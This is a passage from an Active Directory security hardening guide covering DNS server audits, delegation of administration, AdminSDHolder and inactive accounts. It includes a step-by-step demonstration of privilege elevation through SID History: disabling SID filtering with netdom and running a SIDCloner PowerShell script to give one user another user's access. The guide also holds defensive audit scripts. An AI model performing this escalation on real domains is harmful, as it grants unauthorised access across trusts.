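        if ($zone.SecureSecondaries -eq 'TransferAnyServer') {
            $findings += "Zone $($zone.ZoneName): zone transfer allowed to any server"
        }

        # 4. DNSSEC
        if (-not $zone.IsSigned) {
            $findings += "Zone $($zone.ZoneName): not signed with DNSSEC"
        }
    }

    # 3. cache pollution protections: 'Secure cache against pollution', cache locking, socket pool
    $cache = Get-DnsServerCache -ComputerName $ComputerName
    if (-not $cache.EnablePollutionProtection) {
        $findings += "Server: 'Secure cache against pollution' is disabled"
    }
    if ($cache.LockingPercent -lt 100) {
        $findings += "Server: cache locking percent is $($cache.LockingPercent) (default 100)"
    }
    $settings = Get-DnsServerSetting -ComputerName $ComputerName -All
    if ($settings.SocketPoolSize -lt 2500) {
        $findings += "Server: SocketPoolSize is $($settings.SocketPoolSize) (default 2500)"
    }

    return $findings
}

function Repair-DnsServerHardening {
    # Remediates the most common findings; run once, after reviewing the audit output.
    param([string]$ComputerName = $env:COMPUTERNAME)

    Set-DnsServerCache -ComputerName $ComputerName -PollutionProtection $true -LockingPercent 100

    # Only AD-integrated primary zones: force secure dynamic update and refuse zone transfers
    Get-DnsServerZone -ComputerName $ComputerName |
        Where-Object { $_.ZoneType -eq 'Primary' -and $_.IsDsIntegrated -and -not $_.IsAutoCreated } |
        ForEach-Object {
            Set-DnsServerPrimaryZone -ComputerName $ComputerName -Name $_.ZoneName `
                -DynamicUpdate Secure -SecureSecondaries NoTransfer
        }
}

# Report only; call Repair-DnsServerHardening separately once the findings have been reviewed
Test-DnsServerHardening | ForEach-Object { Write-Warning $_ }
```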

1.6 ELEVATION OF PRIVILEGE USING SID HISTORY

1.6.1 PERFORMING A PRIVILEGE ELEVATION WITH SID HISTORY

In this example we have two forests:

• TPO.NET: a forest with one domain, configured in native mode 2008 R2
• MSREPORT.BE: a forest with one domain, configured in native mode 2008 R2

Our goal is to copy the SID of the user TPO\melanie.mathieu into the sIDHistory attribute of the user msreport\tigrou.mathieu. Tigrou MATHIEU will then have all the accesses of Melanie MATHIEU (privilege elevation). The sIDHistory attribute is protected by the operating system: a member of the Domain Admins group has no right to add or delete a SID History entry (see the error message below). The sIDHistory attribute is an array that can hold several SIDs.

To add a SID to the sIDHistory attribute, we'll use the SIDCloner script available at: https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory831a

1.6.1.1 Configuring the DNS name resolution

Create a first STUB zone for the zone msreport.be. Store this zone in ForestDnsZones (it replicates to all domain controllers in the forest TPO.NET). Create a second stub zone for the zone _msdcs.msreport.be (same configuration as for the zone msreport.be). A step-by-step procedure is available at this address: http://support.microsoft.com/kb/308201 . Check that all DNS servers in the domain TPO.NET (the DCs) can now resolve DNS entries in the DNS zones msreport.be and _msdcs.msreport.be. You can do this using the NSLOOKUP tool.

Configure the DNS service so that the domain controllers of msreport.be resolve DNS entries of tpo.net

The principle is the same as in the previous step. You must create two STUB zones, tpo.net and _msdcs.tpo.net, and store them in the directory partition ForestDnsZones.



1.6.1.2 Creating cross-forest trust relationship

In this example, we will create a cross-forest trust relationship without selective authentication. Log on to the PDC Emulator of the domain msreport.be and launch the console Active Directory Domains and Trusts.

Right-click on the domain name (msreport.be in this example) and click New Trust. Enter the name of the domain to trust (tpo.net). Choose Forest trust. Then select Two-way so that the trust relationship is created in both domains.

You must authenticate in the trusted domain.

In our case, we will not enable selective authentication. We must therefore select Forest-wide authentication.

The users of the forest tpo.net will thus become members of the group Authenticated Users in the forest msreport.be, and vice versa.



Active Directory detects the UPN suffixes of the trusted domain. UPN suffixes are alternative domain names. It is thus possible to give users a UserPrincipalName (login) that corresponds to their email address. Users can then log on with their email address as login, and their password.

Then confirm the trust relationship (inbound and outbound).

1.6.1.3 Disable SID filtering and enable the SID History

It is now necessary to disable SID filtering and activate SID History on the trust relationship. Microsoft developed SID filtering (enabled by default) to fight against privilege elevation with SID History (which is exactly what we are doing).

When SID filtering is enabled, the SIDs contained in the sIDHistory attribute are ignored. Disabling SID filtering therefore significantly lowers the security level of your Active Directory. This option is, however, necessary in the context of the merger of two Active Directory domains with tools like Microsoft ADMT or Dell Migration Manager for Active Directory.

Example: you want to migrate the resources of the domain tpo.net (user accounts, computer accounts, groups, workstations and domain member servers) into the domain msreport.be.

To disable SID filtering and enable SID History:

Type the following commands on the PDC Emulator domain controller of the domain tpo.net:
netdom trust msreport.be /domain:tpo.net /quarantine:no /usero:administrator /passwordo:XXXXX
netdom trust msreport.be /domain:tpo.net /EnableSidHistory:Yes /usero:administrator /passwordo:XXXXX

Type the following commands on the PDC Emulator domain controller of the domain msreport.be:
netdom trust tpo.net /domain:msreport.be /quarantine:no /usero:administrator /passwordo:XXXXX
netdom trust tpo.net /domain:msreport.be /EnableSidHistory:Yes /usero:administrator /passwordo:XXXXX

Note that if your domain controllers are installed in French, there is a translation error in the command. You must type:

netdom trust msreport.be /domain:tpo.net /Quarantine:No /usero:administrator /passwordo:XXXXX
netdom trust msreport.be /domain:tpo.net /EnableSidHistory Yes /usero:administrator /passwordo:XXXXX

1.6.1.4 Configuring domain controllers

As the domain controllers of tpo.net and msreport.be are Windows 2008 R2 and Windows 2012 R2, it is not necessary to create the registry entry TcpipClientSupport, as stated in the ADMT documentation:

"If you are migrating from a domain with domain controllers that run Windows Server 2003 or later to another domain with domain controllers that run Windows Server 2003 or later, the TcpipClientSupport registry entry does not have to be modified."

The domain local group TPO$$$ was created in the Users container of the domain tpo.net. Configure the Default Domain Controllers Policy in the domains msreport.be and tpo.net with the following audit settings, as required in the ADMT documentation:

• Audit account management: check the boxes Success and Failure.

• Audit directory service access: check the box Success.

On Windows 2012 domain controllers you must also do this in the local GPO of the server (Gpedit.msc). Otherwise the SIDCLONER PowerShell script fails with the error: The operation requires that destination domain auditing be enabled. ADMT detects the problem and offers to fix it when migrating a user.

1.6.1.5 Create the account service-admt in the domain tpo.net

Create the account service-admt in the source domain (tpo.net). This user must be a member of the group Domain Admins in the source domain and must be configured so that the password never expires. In the target domain (msreport.be), add the user tpo\service-admt to the group msreport\Administrators.



1.6.1.6 Use SIDCLONER to add SID History

Copy the SID of TPO\melanie.mathieu to the user msreport\tigrou.mathieu.

Log on with the account service-admt@tpo.net (tpo\service-admt) on the domain controller holding the PDC Emulator role of the domain msreport.be.

Download and install Visual C++ Redistributable for Visual Studio 2012 Update 4:
https://www.microsoft.com/en-us/download/details.aspx?id=30679
Create the folder C:\_adm.
Copy the file SIDCloner.dll (from SIDCloner_binaries.zip) from the website below and put it in the folder C:\_adm. Take the X64 release.

https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory-831ae24b
Create the file c:\_adm\identities.csv and edit it with Notepad. This file must be comma-separated and have the following format:

sourceDomain,sourceSAMAccountName,targetSAMAccountName
tpo.net,melanie.mathieu,tigrou.mathieu

Create the empty file c:\_adm\CloneFailed.csv. Click the Unblock button in the properties of the SIDCloner.dll file.

The website https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory-831ae24b offers a sample script. The code has been simplified.
Create the file C:\_adm\script.ps1 and edit it with Notepad. Type this code:

param (
    [Parameter(Mandatory = $false)] [String] $inFile
)
$ErrorActionPreference = 'Continue'
# constants
$targetDomain = "msreport.be"
[System.Reflection.Assembly]::LoadFile("c:\_adm\SIDCloner.dll") | Out-Null
# process parameters
# customize file / folder names
if ([String]::IsNullOrEmpty($inFile)) { $inFile = "c:\_adm\identities.csv" }
# clear the log file
if ([System.IO.File]::Exists("c:\_adm\CloneFailed.csv")) {
    Remove-Item -Path "c:\_adm\CloneFailed.csv"
}

$data = Import-Csv $inFile

# authenticate using implicit credentials
$i = -1

foreach ($record in $data) {
    try {
        $i++
        # uses the credentials of the logged-on user (or credentials stored in Credential Manager); works against the PDC in both domains
        [wintools.sidcloner]::CloneSid(
            $record.sourceSAMAccountName,
            $record.sourceDomain,
            $record.targetSAMAccountName,
            $targetDomain
        )
        Write-Host "Account $($record.sourceDomain)\$($record.sourceSAMAccountName) cloned"
    }
    catch {
        Write-Warning -Message "Account $($record.sourceDomain)\$($record.sourceSAMAccountName) failed to clone`n`tError: $($_.Exception.Message)"
        # one line per failed account in the CSV log
        "$($record.sourceSAMAccountName),$($record.sourceDomain),$($record.targetSAMAccountName)" >> "c:\_adm\CloneFailed.csv"
    }
}

Start PowerShell as an administrator and run the script c:\_adm\script.ps1. You should get the following result:

The account tigrou.mathieu should now have in its SID History the SID of the user tpo\melanie.mathieu.



1.6.2 DELETING THE SID HISTORY

Download the AdFind and AdMod tools and install them in the folder c:\_adm on the ADMT server.

http://www.joeware.net/freetools/tools/adfind/
http://www.joeware.net/freetools/tools/admod/

Run the following command to delete the SID History of the user tigrou.mathieu:
C:\_adm\adfind.exe -b "CN=Tigrou Mathieu,OU=Techdays,DC=msreport,DC=be" sIDHistory -adcsv | c:\_adm\AdMod.exe -sc csh -unsafe

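The two conditions section 1.6 relies on, a trust with SID filtering disabled and a sIDHistory attribute carrying a foreign SID, are also what a defender should look for. The following PowerShell script is an added example (not part of the original document); it assumes the ActiveDirectory module, read access to the domain and to every domain of the forest, and the function names are this example's own.

```powershell
# Added example: inventory trusts with SID filtering disabled and accounts carrying
# sIDHistory values from another domain or forest. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-TrustSidFilteringStatus {
    # SIDFilteringQuarantined = False is the state left by "netdom ... /quarantine:no";
    # on a forest trust, SIDFilteringForestAware reflects /EnableSidHistory.
    Get-ADTrust -Filter * |
        Select-Object Name, Direction, TrustType, SelectiveAuthentication,
                      SIDFilteringQuarantined, SIDFilteringForestAware
}

function Get-SidHistoryReport {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    $localDomainSid = (Get-ADDomain).DomainSID.Value
    # Domain SIDs of the whole forest, to tell an intra-forest migration from a foreign SID
    # (assumes every domain of the forest is reachable from where the script runs)
    $forestDomainSids = (Get-ADForest).Domains |
        ForEach-Object { (Get-ADDomain -Identity $_).DomainSID.Value }

    Get-ADObject -LDAPFilter '(sIDHistory=*)' -SearchBase $SearchBase -Properties sIDHistory |
        ForEach-Object {
            $obj = $_
            foreach ($sid in $obj.sIDHistory) {
                $sidString  = [string]$sid
                $cut        = $sidString.LastIndexOf('-')
                $domainPart = $sidString.Substring(0, $cut)
                $rid        = [int]$sidString.Substring($cut + 1)
                $origin = if ($domainPart -eq $localDomainSid) { 'SameDomain' }
                          elseif ($forestDomainSids -contains $domainPart) { 'SameForest' }
                          else { 'ForeignForest' }
                [pscustomobject]@{
                    Object     = $obj.DistinguishedName
                    Class      = $obj.ObjectClass
                    HistorySid = $sidString
                    # ForeignForest is what a cross-forest SID clone (section 1.6.1.6) leaves behind
                    Origin     = $origin
                    # RIDs below 1000 are well-known principals (500 Administrator, 512 Domain Admins, 519 Enterprise Admins)
                    Privileged = ($rid -lt 1000)
                }
            }
        }
}

Get-TrustSidFilteringStatus | Format-Table -AutoSize
# Entries worth reviewing: anything not explained by a migration inside the domain, or pointing at a well-known RID
Get-SidHistoryReport | Where-Object { $_.Origin -ne 'SameDomain' -or $_.Privileged } | Format-Table -AutoSize
```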


2 GOOD PRACTICES FOR DELEGATING THE ADMINISTRATION OF YOUR DIRECTORY

2.1 BASIC PRINCIPLES OF DELEGATION OF ADMINISTRATION

2.1.1 THE DIFFERENT TYPES OF ACTIVE DIRECTORY ADMINISTRATORS

There are two major families of Active Directory administrators:

Active Directory service administrators:

These people are in charge of running Active Directory and of its evolution. They take care of the administration of the domain controllers, the supervision of the directory (validation of the operation of the directory and of the domain controllers), the backup of the directory and the functional change projects of this directory (migration of the domain controllers to Windows 2012 R2).

They do not manage the contents of the directory (no management of user accounts, groups, computer accounts, group policy objects...). Only Active Directory service administrators must have significant privileges on the directory. An Active Directory service administrator usually has a named administration account, member of groups such as Domain Admins, and a standard user account (for Internet access and enterprise applications).

Active Directory content administrators:

These people are in charge of the data administration of Active Directory (user accounts, groups, computer accounts, group policy objects). They must have the most limited rights possible on Active Directory. An Active Directory content administrator usually has a named administrative account with restricted privileges on some OUs and a standard user account (for Internet access and enterprise applications).

2.1.2 GROUPS WITH ADMINISTRATION PRIVILEGES

By default, when a domain is created, users and administrative groups presented in the following table are created.

Windows 2000 < SP4    Windows 2000 SP4 - Windows Server 2003   Windows Server 2003 SP1+      Windows Server 2008 (and later)
Administrators        Account Operators                        Account Operators             Account Operators
Domain Admins         Administrators                           Administrators                Administrators
Enterprise Admins     Backup Operators                         Backup Operators              Backup Operators
Schema Admins         Cert Publishers                          Domain Admins                 Domain Admins
                      Domain Admins                            Domain Controllers            Domain Controllers
                      Domain Controllers                       Enterprise Admins             Enterprise Admins
                      Enterprise Admins                        Print Operators               Print Operators
                      Print Operators                          Schema Admins                 Read-only Domain Controllers
                      Schema Admins                                                          Schema Admins

These groups have very important permissions on the directory. Only the accounts of the Active Directory service administrators must be members of these groups. It is also important to note that applications like Exchange, Lync and SCCM create their own security groups, which also have very important rights on the directory. The members of these groups must therefore also be monitored.

The following script lists the direct and indirect members of the main Active Directory administrative groups.

# For non-US domain controllers, please change the content of $Groups (localized group names)
# Import the Active Directory module
Import-Module ActiveDirectory
# Variables
$Users = @()
$ResultFile = "c:\scripts\admins_accounts.txt"
# List of groups managed by the solution
$Groups = @("Account Operators", "Administrators", "Backup Operators", "Domain Admins", "Domain Controllers", "Enterprise Admins", "Print Operators", "Read-only Domain Controllers", "Schema Admins")
# List all members (direct and nested) of the groups in $Groups
foreach ($Group in $Groups) {
    $Users += $(Get-ADGroupMember -Identity $Group -Recursive)
}
$Users = $Users | Sort-Object -Property SamAccountName -Unique | Select-Object SamAccountName, ObjectClass, Sid
# Generate the result file: one hashtable per account, one key per group
# (Get-ADPrincipalGroupMembership only returns direct memberships, so an account that is
# only a nested member shows $False for every group but still appears in the list)
$Resu = @{}
echo $Resu | Out-File $ResultFile
foreach ($User in $Users) {
    foreach ($Group in $Groups) {
        if (Get-ADPrincipalGroupMembership $($User.SamAccountName) | Where { $_.Name -eq $Group }) {
            $Resu[$Group] = $True
        } else {
            $Resu[$Group] = $False
        }
    }
    $Resu["user"] = $($User.SamAccountName)
    echo $Resu | Out-File $ResultFile -Append
}

2.1.3 DELEGATING ADMINISTRATION TO A STANDARD USER

The goal is to avoid adding this standard user to groups with significant administrative privileges. Objects in Active Directory have permissions. You can view these permissions in the Security tab of an object. For that, you must configure the Active Directory Users and Computers console in Advanced Features view mode.



To view the permissions on an object, go to the properties of this object, then to the Security tab. Click the Advanced button. Each Active Directory object has permissions. You can delegate, for each object class (users, groups, organizational units, group policy objects, DNS entries, DNS zones...), the right to read or write each attribute of this class of objects. This delegation of administration can be performed at the level of an organizational unit or directly on an object (user account, group...).

It is for example possible with Active Directory to delegate to the HR team the right to update only the attributes employeeID and employeeType in a specific OU.
Let us now take a slightly more complex case:
You want to delegate to the directory content administrators the right to create, edit, delete and manage all properties (all attributes) of the user accounts in an OU called Techdays. To do this, you must:

• Create a group called GG_Helpdesk_Techdays.

• Delegate the right to create and delete child objects (user accounts) on the organizationalUnit class (the OU object).

• Delegate the right Full control on the class user (user account objects).

In the example above, This object and all descendant objects corresponds to the organizational unit (OU) Techdays and all the OUs it contains.

Descendant User objects corresponds to all user accounts in the OU Techdays.

We see in the following screenshot that the group GG_Helpdesk_Techdays only has the right to create and delete user accounts in the OU Techdays (and all its sub-OUs).

We see in the following screenshot that the group GG_Helpdesk_Techdays also has all rights on the attributes of the class User.

Microsoft provides the wizard Delegation of Control to simplify the implementation of the delegation. The screenshots below show the procedure to apply.

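The same two delegations (create / delete user objects on the OU, full control on descendant user objects) can be applied and then read back for audit with the Active Directory PowerShell provider, which is what the following added example does (it is not code from the document). It assumes the ActiveDirectory module, the group GG_Helpdesk_Techdays and the OU Techdays of msreport.be from the document, and an account allowed to modify the security descriptor of the OU.

```powershell
# Added example: delegate user administration on OU=Techdays to GG_Helpdesk_Techdays
# with explicit ACEs, then list the non-inherited ACEs of the OU for audit.
Import-Module ActiveDirectory
Add-Type -AssemblyName System.DirectoryServices

$ouDn     = 'OU=Techdays,DC=msreport,DC=be'                  # OU from the document
$groupSid = (Get-ADGroup 'GG_Helpdesk_Techdays').SID          # group from the document
# schemaIDGUID of the "user" class; this value is the same in every Active Directory forest
$userClass = [guid]'bf967aba-0de6-11d0-a285-00aa003049e2'

function Grant-UserAdministration {
    param(
        [string]$Dn,
        [System.Security.Principal.SecurityIdentifier]$Sid
    )
    $acl = Get-Acl -Path "AD:\$Dn"

    # ACE 1: create / delete child objects of class user, on this OU and all descendants
    # (what the Advanced dialog shows as "This object and all descendant objects", object type user)
    $acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $Sid,
        [System.DirectoryServices.ActiveDirectoryRights]'CreateChild, DeleteChild',
        [System.Security.AccessControl.AccessControlType]::Allow,
        $userClass,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All)))

    # ACE 2: full control, but only on descendant user objects
    # ("Descendant User objects" in the Advanced dialog)
    $acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $Sid,
        [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents,
        $userClass)))

    Set-Acl -Path "AD:\$Dn" -AclObject $acl
}

function Get-DelegatedAces {
    # Non-inherited ACEs are the ones set on this OU itself: the list to review
    # when auditing delegations (ObjectType / InheritedObjectType show the class GUIDs).
    param([string]$Dn)
    (Get-Acl -Path "AD:\$Dn").Access |
        Where-Object { -not $_.IsInherited } |
        Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType,
                      ObjectType, InheritedObjectType, InheritanceType
}

Grant-UserAdministration -Dn $ouDn -Sid $groupSid
Get-DelegatedAces -Dn $ouDn |
    Where-Object { $_.IdentityReference -like '*GG_Helpdesk_Techdays' } |
    Format-Table -AutoSize
```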
2.1.3.1 The Well-Known Security Principals

There are many special groups / accounts called Well-Known Security Principals (in French: entités de sécurité connues). These entities have standard, fixed SIDs.
http://support.microsoft.com/kb/243330/en-us
http://technet.microsoft.com/en-us/library/cc779144(v=ws.10).aspx
The predefined group Authenticated Users has the SID S-1-5-11. Membership of this group is managed by the system and cannot be changed manually. This group contains all users and computers that have logged on to any domain of an Active Directory forest, as well as those that have logged on with a SAM-based (local database) user account, with the exception of the Guest account.

It is possible to assign NTFS permissions to this group or to add it to a group of the local SAM database of a machine. It is not possible to add Authenticated Users as a member of a domain local, global or universal group created by an administrator.

Authenticated Users has a great many privileges on Windows workstations. By default, it can log on locally to all domain member machines and to trusted domains, because it is a member of the Users group of the local SAM database, and this Users group has the right to log on locally to domain member machines.

By default Authenticated Users also has very important rights on the file system of a Windows 7 machine.

If you create a new folder C:\Msreport, Authenticated Users has the Modify right on this folder:
http://searchwindowsserver.techtarget.com/news/1195097/Foreign-security-principals-and-the-ActiveDirecory-architecture

The group Authenticated Users is located in the container Well-Known Security Principals of the configuration partition (which is replicated to all domains in the forest). This group is common to all domains in the same forest. It is also present in the container ForeignSecurityPrincipals. This object extends the membership of Authenticated Users to all user accounts and computers that have logged on from a trusted domain (without selective authentication).

It is among other things because of the group Authenticated Users that Microsoft now defines the forest as the only security boundary.

Trust relationships with selective authentication make it possible not to extend the membership of the group Authenticated Users to the users of a trusted domain. For this, the two forests that trust each other must be in native 2003 mode.

2.2 DELEGATE ADMINISTRATION WITH ORGANIZATIONAL UNITS

To delegate administration to the various teams of Active Directory content administrators, it is necessary to design an organizational unit (OU) topology that reflects the organization of the company.

If you have an autonomous IT team at each site of the company, you can create an OU for each location and delegate rights on each OU to the IT staff in charge of that OU (that site).

If you want to delegate the administration of certain accounts / groups to department heads, you can create an OU for each department.

2.3 CREATE NAMED ACCOUNTS DEDICATED TO ADMINISTRATION

It is fundamental to create user accounts dedicated to the administration of the directory. These accounts must be named (one per person) in order to trace the changes made by each administrator. Logon with an administrator account should only be possible on secure machines dedicated to the administration of the directory. If possible, local logon with an administrative account should be blocked on all other business machines.

For this reason, administration teams generally have two accounts:
• An account to log on to the administration machines. The Active Directory administration tools must be installed on these machines.

• A standard account without administrative privileges on the directory, to access email, the Internet and other enterprise applications.

To restrict the machines on which users can log on with their administration account, you can use the following: go to the properties of the administrative user account, on the Account tab, click Log On To and check the box The following computers. Enter the list of machines where the user can log on (up to 1024 machines). This method prevents local logon, but the user can still access unauthorized machines via the network (access to shares).

An alternative to this method is to configure the GPO setting Deny log on locally with a user group representing all administrative accounts, and to apply this GPO on all machines in the domain except the administration machines. This is necessary because attacks such as Pass The Hash (NTLM) and Access Token Stealing (with Incognito) may allow an attacker to recover access to all user accounts that have logged on to a machine (hence the need to secure the administration machines).

2.4 DELEGATE ONLY THE RIGHTS THAT ARE REQUIRED

As previously stated, you must delegate the minimum rights to the teams in charge of administering the contents of the directory.

The more rights you delegate, the more you increase the risk that an attacker elevates privileges by compromising an administration workstation and using attacks like Pass The Hash (NTLM) and Access Token Stealing (with INCOGNITO).

2.5 DISABLE THE GUEST ACCOUNT AND RENAME THE ADMINISTRATOR ACCOUNT

The Guest account must be disabled. Some security best practices recommend renaming, or even disabling, the default Administrator account. Renaming has little impact because this account has a specific SID (ending with 500) and is therefore easy to find.

Disabling the Administrator account can be a mistake, especially if you enable account lockout. Indeed, the Administrator account (created by the system) is the only one that cannot be locked out.

2.6 AUDIT PERMISSIONS ON ACTIVE DIRECTORY OBJECTS

It is possible to audit permissions on Active Directory with the console Active Directory Users and Computers, with Active Directory Administrative Center, with the tool Dsacls.exe or with the PowerShell cmdlet Get-Acl. I invite you to read these two articles if you want to create scripts to audit the permissions on your directory:

http://blogs.technet.com/b/heyscriptingguy/archive/2012/03/12/use-powershell-to-explore-activedirectory-security.aspx

http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions

ANSSI also provides an answer to this problem with its tool AD-permissions:
http://www.ssi.gouv.fr/IMG/pdf/Audit_des_permissions_en_environnement_Active_Directory_article.pdf
The installation sources of the AD-permissions tool are available at:
https://github.com/ANSSI-FR/AD-permissions

2.7 AUDIT THE adminSDHolder OBJECT

Active Directory provides a mechanism called AdminSDHolder to protect the permissions set on the sensitive groups: Account Operators, Administrator, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, krbtgt, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, and Server Operators.

The principle?
When an object is defined as protected, the attribute AdminCount is set to 1 on this object. The inheritance of permissions from parent objects in Active Directory is disabled. A scheduled task called SDPROP copies every 60 minutes (configurable interval) the permissions set on a model object called AdminSDHolder to each protected object (such as the group Domain Admins).

The AdminSDHolder object is located in the System container at the root of each Active Directory domain.

If a user is added to a protected group such as Domain Admins, that user is then protected too. SDPROP will reset the permissions of that object. We see in the example below that the object guillaume.mathieu (member of the group Domain Admins) has no inherited permission and has the same permissions as the AdminSDHolder object. The object guillaume.mathieu also has the AdminCount attribute set to the value 1.

It is possible to define the time interval at which the SDPROP task runs by modifying the following registry entry:

HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\AdminSDProtectFrequency

Microsoft also provides a procedure to start SDPROP manually:
http://support.microsoft.com/kb/251343/en-us
Note that when an account is no longer a member of a protected group, the attribute AdminCount remains at 1 and permission inheritance is not re-applied. You must then manually re-enable inheritance in the permissions of the object. This problem is described in the following Microsoft article:
http://support2.microsoft.com/kb/817433/en-us

You can configure AdminSDHolder not to protect certain groups. For this, you must modify the attribute dSHeuristics of the AdminSDHolder object. For more information:
http://support2.microsoft.com/kb/817433/en-us

For more information on AdminSDHolder and SDPROP:
http://technet.microsoft.com/fr-fr/magazine/2009.09.sdadminholder.aspx

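The orphaned accounts described above (AdminCount still at 1, inheritance still disabled, but no longer in any protected group) can be found and repaired with the following PowerShell script, an added example that is not code from the document. It assumes the ActiveDirectory module and uses the protected group list of section 2.7; it reports first and only repairs when the last line is uncommented.

```powershell
# Added example: find user accounts whose adminCount=1 protection is stale, then
# re-enable permission inheritance and clear adminCount for each of them.
Import-Module ActiveDirectory

# Protected groups as listed in section 2.7 (Enterprise Admins and Schema Admins
# only exist in the forest root domain; Get-ADGroup simply returns nothing elsewhere)
$protectedGroups = @('Account Operators', 'Administrators', 'Backup Operators', 'Domain Admins',
                     'Domain Controllers', 'Enterprise Admins', 'Print Operators',
                     'Read-only Domain Controllers', 'Replicator', 'Schema Admins', 'Server Operators')

function Get-ProtectedMemberSids {
    $sids = @{}
    foreach ($name in $protectedGroups) {
        $group = Get-ADGroup -Filter "Name -eq '$name'"
        if (-not $group) { continue }
        # -Recursive expands nested groups, which is also how SDPROP evaluates membership
        Get-ADGroupMember -Identity $group -Recursive |
            ForEach-Object { $sids[$_.SID.Value] = $true }
    }
    return $sids
}

function Get-OrphanedAdminCountUsers {
    $protected = Get-ProtectedMemberSids
    Get-ADUser -LDAPFilter '(adminCount=1)' -Properties adminCount |
        Where-Object {
            $_.SamAccountName -ne 'krbtgt' -and          # protected in its own right, never a group member
            -not $protected.ContainsKey($_.SID.Value)
        }
}

function Repair-OrphanedAdminCountUser {
    param([Parameter(Mandatory)][Microsoft.ActiveDirectory.Management.ADUser]$User)
    $path = "AD:\$($User.DistinguishedName)"

    # 1. Re-enable inheritance of permissions from the parent OU. The explicit ACEs
    #    copied by SDPROP stay in place; compare them with the parent before removing any.
    $acl = Get-Acl -Path $path
    $acl.SetAccessRuleProtection($false, $true)
    Set-Acl -Path $path -AclObject $acl

    # 2. Clear adminCount so that the account is no longer reported as protected
    Set-ADUser -Identity $User -Clear adminCount
}

# Report first, repair after review
$orphans = Get-OrphanedAdminCountUsers
$orphans | Select-Object SamAccountName, DistinguishedName | Format-Table -AutoSize
# $orphans | ForEach-Object { Repair-OrphanedAdminCountUser -User $_ }
```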


2.8 ENABLE A PASSWORD-PROTECTED SCREEN SAVER

It is recommended to enable an automatic password-protected screen saver after 5 to 10 minutes of inactivity. It is not uncommon for an administrator to forget to lock his session. It is possible to configure the screen saver on the domain machines using a GPO setting in User Configuration | Policies | Administrative Templates | Control Panel | Personalization.

You should get the result below.



2.9 DISABLE INACTIVE ACCOUNTS

It is necessary to disable inactive user accounts. In general, the longest absences last six months, or 180 days. This is normally the responsibility of the directory content administration teams. But for many customers, managing the departure of contractors is a very complex task. Often contractor accounts are not disabled. For this reason, the team in charge of Active Directory administration must check for accounts that are active but not used.

The solution proposed below automatically disables user accounts and can generate an output file. It works with Windows 2003 domain controllers and later versions. It uses the PowerShell module Quest ActiveRoles Management Shell. I invite you to use version 1.5 or 1.6 of the plugin for large directories because there is a memory leak problem with version 1.7 when you need to load a directory with more than 10,000 entries.

Deployment:
Install the PowerShell module Quest ActiveRoles Management Shell on a domain member machine. This module can be downloaded at the following address: http://software.dell.com/fr-fr/trials/#a
Create the file c:\_adm\scripts\DisableUnusedAccount-180days.ps1 on a server. Start PowerShell ISE and copy the code below. Set the variable $datelimit and create a scheduled task to run this script.

# This script disables user accounts if:
# 1. The account has not logged on for more than 180 days (attribute lastLogonTimestamp),
#    when lastLogonTimestamp is not empty.
# 2. lastLogonTimestamp is empty but the account was created more than 180 days ago
#    (attribute whenCreated).
# 3. Accounts whose Description field contains "Service Account ****" are never disabled.

# Load the Quest ActiveRoles PowerShell snap-in
Add-PSSnapin Quest.ActiveRoles.ADManagement
# Connect to the domain controller MSREPORTDC1
Connect-QADService MSREPORTDC1
# Allow PowerShell to return up to 100,000 results
Set-QADPSSnapinSettings -DefaultSizeLimit 100000

# VARIABLES ===========================================
$date = Get-Date
$datelimit = $date.AddDays(-180)
$scopesearch = "OU=Users,DC=msreport,DC=intra"
# =====================================================

# Build the list of accounts to disable
$database = Get-QADUser -Enabled -SearchRoot $scopesearch | Where-Object {
    ($_.LastLogonTimestamp -le $datelimit -and $_.LastLogonTimestamp -ne $null) -or
    ($_.WhenCreated -le $datelimit -and $_.LastLogonTimestamp -eq $null)
} | Select-Object DN, Description, Name, DisplayName, Email, SamAccountName, LastLogonTimestamp, WhenCreated

# Output file named after the current date
$fileresult = "C:\_adm\Disable-account\Accounts-DISABLED\Comptesdesactives-" + $((Get-Date).ToString('dd-MM-yyyy')) + ".csv"
# echo $fileresult
# Write the header line of the report file
"DN;Name;DisplayName;SamAccountName;Email;lastLogonTimestamp (FR format);whenCreated (FR format)" | Out-File -FilePath $fileresult -Encoding ASCII

# Generate the report, update the Description field and disable each account
foreach ($user in $database) {
    $newdescription = ""
    # Check the Description field: service accounts are skipped
    if ($($user.Description) -notlike "*Service Account*") {
        # Add a new line to the results file
        $userLastLogonTimeStamp = ""
        if ($user.LastLogonTimestamp -ne $null) {
            $userLastLogonTimeStamp = $($user.LastLogonTimestamp).ToString('dd-MM-yyyy')
        }
        $userWhenCreated = $($user.WhenCreated).ToString('dd-MM-yyyy')
        "$($user.DN);$($user.Name);$($user.DisplayName);$($user.SamAccountName);$($user.Email);$userLastLogonTimeStamp;$userWhenCreated" | Out-File -FilePath $fileresult -Append
        # Disable the user account
        Disable-QADUser -Identity $($user.SamAccountName)
        # The Description attribute is limited to 1024 characters
        if ($($user.Description).Length -lt 1024) {
            $newdescription = "This account has been disabled on " + $((Get-Date).ToString('dd-MM-yyyy')) + " by your administrator - " + $($user.Description)
        } else {
            $newdescription = "This account has been disabled on " + $((Get-Date).ToString('dd-MM-yyyy')) + " by your administrator."
        }
        # Update the Description field
        Set-QADUser -Identity $($user.SamAccountName) -Description $newdescription
    }
}



2.10 TOOLS TO SIMPLIFY THE DELEGATION OF ADMINISTRATION

Active Directory natively allows permissions on the directory to be delegated in a very fine-grained way. Many tools (management consoles, PowerShell and HTA scripts) make it possible to delegate administration of the directory to non-IT staff. These tools, however, do not allow you:

• To track the changes made to objects (user accounts, groups, OUs).
• To manage security group membership based on the location of the user in the OU tree.
